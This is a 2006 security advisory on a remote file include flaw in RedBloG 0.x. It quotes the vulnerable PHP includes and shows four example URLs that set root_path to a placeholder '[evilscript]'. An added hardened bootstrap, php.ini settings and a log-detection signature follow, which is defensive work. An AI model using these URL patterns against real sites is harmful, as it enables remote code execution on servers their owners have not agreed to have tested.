RedBloG 0.x Multiple Remote File Include

2006-09-23T00:00:00
ID SECURITYVULNS:DOC:14392
Type securityvulns
Reporter Securityvulns
Modified 2006-09-23T00:00:00

Description

RedBloG 0.x Multiple Remote File Include

Discovered: KeyCoder

HomePage : http://keycoder.blogspot.com

Contact: keycoder[at]msn[dot]com

Greetz: SecretlyX-BeLa-BodyGuarD #


Details:

RedBloG 0.x Multiple (root_path) Remote File Include Vulnerability

Script: http://sourceforge.net/projects/redblog

Vulnerable Files: /admin/index.php, /admin/config.php, imgen.php, common.php

Risk: High

Class: Remote


Vulnerable Files Detail:


/admin/index.php

define('REDBLOG', true);
$root_path = './../';
require_once($root_path . 'common.php');
require_once($root_path . 'includes/functions.php');

/admin/config.php

define('REDBLOG', true);
$root_path = './../';
require_once($root_path . 'common.php');
require_once($root_path . 'includes/functions.php');

/imgen.php

define('REDBLOG', true);
define('IMGEN', true);
$root_path = './';
require_once($root_path . 'common.php');

/common.php

require_once($root_path . 'config.php');
require_once($root_path . 'includes/constants.php');
require_once($root_path . 'includes/template.php');
require_once($root_path . 'includes/db.php');

Examples:

http://host/Path/admin/index.php?root_path=[evilscript]
http://host/Path/admin/config.php?root_path=[evilscript]
http://host/Path/imgen.php?root_path=[evilscript]
http://host/Path/common.php?root_path=[evilscript]
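The snippets above show the mechanism: common.php builds every include path from $root_path but never assigns it, so when register_globals is on a request parameter named root_path can supply the value, and the example URLs above are exactly that parameter being set. The block below is an added example, written for this page and not RedBloG's own code or the advisory author's: a hardened replacement for the common.php bootstrap that derives the include base from the file's own location, rejects and logs any request that carries a root_path parameter, and only includes files that resolve beneath the computed root. The helper name redblog_require is hypothetical, the file layout (config.php, includes/constants.php, includes/template.php, includes/db.php) is taken from the advisory, and the syntax is kept PHP 5-compatible to match the era of the project.

```php
<?php
// Added example, not RedBloG code: hardened common.php bootstrap.

// Refuse direct requests for common.php. Every entry point the advisory
// lists defines REDBLOG before including this file; a direct request
// for common.php itself arrives without it and stops here.
if (!defined('REDBLOG')) {
    header('HTTP/1.0 403 Forbidden');
    exit('Direct access is not permitted.');
}

// Derive the installation root from this file's real location. This
// overwrites any $root_path that register_globals or a caller supplied,
// so the include base can never come from the request.
$root_path = dirname(realpath(__FILE__)) . DIRECTORY_SEPARATOR;

// Defender-side telemetry: a root_path parameter in the request has no
// legitimate use for this application, so log the attempt and stop,
// regardless of the register_globals setting.
if (isset($_GET['root_path']) || isset($_POST['root_path'])) {
    $remote = isset($_SERVER['REMOTE_ADDR']) ? $_SERVER['REMOTE_ADDR'] : 'unknown';
    $uri    = isset($_SERVER['REQUEST_URI']) ? $_SERVER['REQUEST_URI'] : 'unknown';
    error_log(sprintf('redblog: rejected root_path parameter from %s for %s',
                      $remote, $uri));
    header('HTTP/1.0 400 Bad Request');
    exit('Invalid request.');
}

// Hypothetical helper: include a file only if it resolves to a real path
// beneath $root. A relative component that escapes the root, or a file
// that does not exist, is treated as a configuration error rather than
// passed to require_once.
function redblog_require($root, $relative)
{
    $target = realpath($root . $relative);
    if ($target === false || strpos($target, $root) !== 0) {
        error_log('redblog: refused include of ' . $relative);
        exit('Configuration error.');
    }
    require_once $target;
}

// The same four includes the advisory shows in common.php, now anchored
// to the computed root.
redblog_require($root_path, 'config.php');
redblog_require($root_path, 'includes/constants.php');
redblog_require($root_path, 'includes/template.php');
redblog_require($root_path, 'includes/db.php');
```

Two php.ini settings close the same hole at the interpreter level and are worth checking on any host that runs this version: register_globals=Off removes the path by which a query parameter becomes $root_path at all, and allow_url_fopen=Off (plus allow_url_include=Off on PHP 5.2 and later) stops include and require from fetching a remote URL even if a variable is tainted. The error_log call above also gives a detection hook: web-server access logs with root_path= in the query string for /admin/index.php, /admin/config.php, imgen.php or common.php are the signature of the requests the Examples section describes.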

Original advisory: http://keycoder.blogspot.com/2006/09/redblog-05-multiple-remote-file.html